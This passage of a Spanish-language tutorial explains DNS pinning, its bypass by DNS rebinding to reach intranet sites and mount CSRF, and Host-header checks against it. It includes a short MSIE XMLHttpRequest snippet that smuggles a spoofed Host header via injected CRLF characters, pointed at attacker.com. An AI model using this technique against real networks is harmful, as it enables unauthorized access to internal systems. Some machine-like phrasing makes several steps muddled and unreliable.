Bien, el 14 de Agosto del 2006, Martin Johns descubrio un concepto de como esto puede ser hecho. El esencialmente descubrio que el DNS Pinning solamente trabaja a condicion de que el servidor web este realmente en linea y disponible. En la mano esto tiene sentido porque si el servidor parece estar caido, las nuevas operaciones de busqueda del DNS son necesarias para descubrir si ha cambiado o se han movido de cierta manera. Sin embargo por otra parte un atacante puede cerrar su servidor siempre que lo desee y de ese modo evita el DNS Pinning del DNS del navegadores del usuario. Una vez mas visualizo este ataque:
1) El navegador de los usuarios se conectar con www.attacker.com y realiza sus operaciones de busqueda de DNS para la URL que recibe 222.222.222.222 con un TTL de 1 segundo.
2) El javascripts le dice al navegador que se conecte de nuevo a www.attacker.com despues de dos segundos, poco despues el TTL expira. Despues de que el servidor ha dicho al firewall sobre si mismo.
3) El DNS Pinning ahora ha caido Anti DNS Pinning. Puesto que el DNS no es un numero valido muy largo, el navegador del usuario se conectar con el servidor DNS para preguntar por www.attacker.com donde esta localizado.
4) El servidor DNS responde con 111.111.111.111, apuntando a www.example.com
5) El navegador del usuario se conecta a 111.111.111.111 que envia una cabecera como:
GET / HTTP/1.1
Host: www.attacker.com
User-Agent: Mozilla/5.0 (Windows; U;
Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept:
*/*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding:
gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive:
300
Connection: keep-alive
Puesto que ahora la IP ha cambiado, el XMLHttpRequest atacante esta leyendo un web site diferente (www.example.com), aun cuando el navegador cree que sigue siendo el mismo. Ahora puedes entender porque inicie este articulo explicando cual es la politica de origen. Podemos romperla usando Anti DNS Pinning.
De todas formas, vamos a resaltar algunas cosas. En primer lugar, el host se cambia a www.attacker.com en vez de www.example.com, mas alli es mejor porque el dato de la cookie no es enviado en la cabecera. Tomar esto en consideracion, pueden preguntarse que haria una persona cualquiera con Anti DNS Pinning en vez de solicitar www.example.com.
Bien, de hecho Anti DNS Pinning del DNS, el atacante no esta haciendo nada bueno a menos que estemos hablando de una intranet o de otra manera los websites serian restringidos por IP, por lo cual el atacante no se podria conectar porque el sitio no es accesible al publico. Aqui es donde Anti DNS Pinning llegar a ser realmente peligroso. En vez de apuntar a www.example.com, podriamos lanzar posiblemente un ataque contra intranet.example.com, que es considerado realmente ser seguro puesto que recide detras de un firewall.
No solo podemos leer los datos contenidos en esas paginas protegidas si no tambien utilizar la informacion para lanzar ataques Cross Site Request Forgery contra usos del intranet.
Kanatako proporciono un buen ejemplo de como trabaja esto en su website. Yo recomiendo checar esto.
http://www.jumperz.net/index.php?i=2&a=1&b=7
Adicionalmente el describe en sla.ckers.org como trabaja su script detalladamente. Si lo lees cuidadosamente, veras que es exactamente lo que acabas de aprender mientras estabas leyendo.
Anti Anti DNS Pinning
El nombre indica sobre de que trata esta tecnica. Alguna gente que se inicia piensa de como Anti DNS Pinning se podria prevenir y terminar con la comprobacion si la cebecera del host es correcta. Recordar que esta se ha cambiado a www.attacker.com y asi que indica un ataque.
Ciertamente no se porque siempre es www.attacker.com pero simplemente porque la cabecera del host diferencia de de el que ha sido permitido por el administrador del servidor.
Anti Anti Anti DNS Pinning
Desafortunadamente esta cabecera puede ser spoofeada facilmente en mas de una forma de modo que la tecnica previamente descrita no resulte ser muy eficaz. Amit Klein publico un post en Bugtraq donde demostro como spoofear el host en MSIE usando XMLHttpRequest o en flash.
<script>
var x = new
ActiveXObject("Microsoft.XMLHTTP");
x.open(
"GET\thttp://attacker.com/\tHTTP/1.0\r\nHost:\twww.example.com
\r\n\r\n,
"http://www.attacker.com/",
false
);
x.send();
alert(x.responseText);
</script>
Espero que este articulo pueda ayudarte a conseguir una comprension del DNS Pinning y sus mutaciones. Sin embargo si tu piensas que esto es una construccion teorica, estas muy equivocado. Chequar RSnakes stories, especialmente Death By 1000 Cutts.
Good luck!!
Autor: christ1an